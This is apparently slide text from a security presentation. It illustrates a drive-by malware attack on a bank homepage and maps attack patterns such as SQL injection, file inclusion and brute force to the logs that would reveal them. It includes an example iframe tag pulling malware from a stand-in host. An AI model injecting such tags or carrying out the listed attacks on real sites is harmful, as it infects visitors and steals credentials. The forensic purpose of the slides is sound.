6. Web site distributes malware http://bank.com/homepage.jsp Exploits and Adds iframe Tag <iframe src =“http://malware.com/malware"> </iframe> in page http://bank.com/homepage.jsp Infected page Access request http://bank.com/homepage.jsp Infected page served to user Accesses http:// bank.com/homepage.jsp and finds out vulnerabilities Home Page gets infected Connection made to external site and malware gets downloaded in background User <html> <body> . . . . <iframe src =“http://malware.com/malware"> </iframe> . . </body> </html> UserID & Pswd
13. Mapping Attack patterns to Logs OS Logs Physical access to the server and copying data on removable media Network Device Logs (Firewall + Switch) Compromise of another server and gain access to this server through a vulnerability there or by trust abuse of that server Web Logs/OS Logs/Database Logs File upload of malicious file Individual Network Service Logs Identification of all other network services and check if any other way in Application Logs/Database Logs Vulnerability inside the application which allows DB backup/restore Web Logs/OS Logs/Database Logs Upload an executable which will take a backup of the database and dump it out OS Logs Brute forcing SAM file , RDP in and stealing database Web Logs Files available on the website found through directory browsing Database Logs/OS Logs Direct connection to the Database and retrieve data FTP Logs Anonymous FTP / brute force passwords and steal backup stored Web Logs/Database Logs PHP Code Injection to retrieve database password Web Logs/Source Code PHP Local and Remote File inclusion to obtain source code and passwords Web Logs/Database Logs/Database Backup Persistent XSS on website Web Logs/Database Logs SQL Injection in the application injecting Iframe into database Web Logs/Database Logs SQL Injection in the application retrieving data
Attacker compromised the site and injected an <iframe tag> in the home page. The iframe tag pointed to an external website that was hosting malware. When a user visited the bank's site, the home page downloaded the malware in the background and infected the browser. The malware would steal passwords the user types in and will mail the attacker.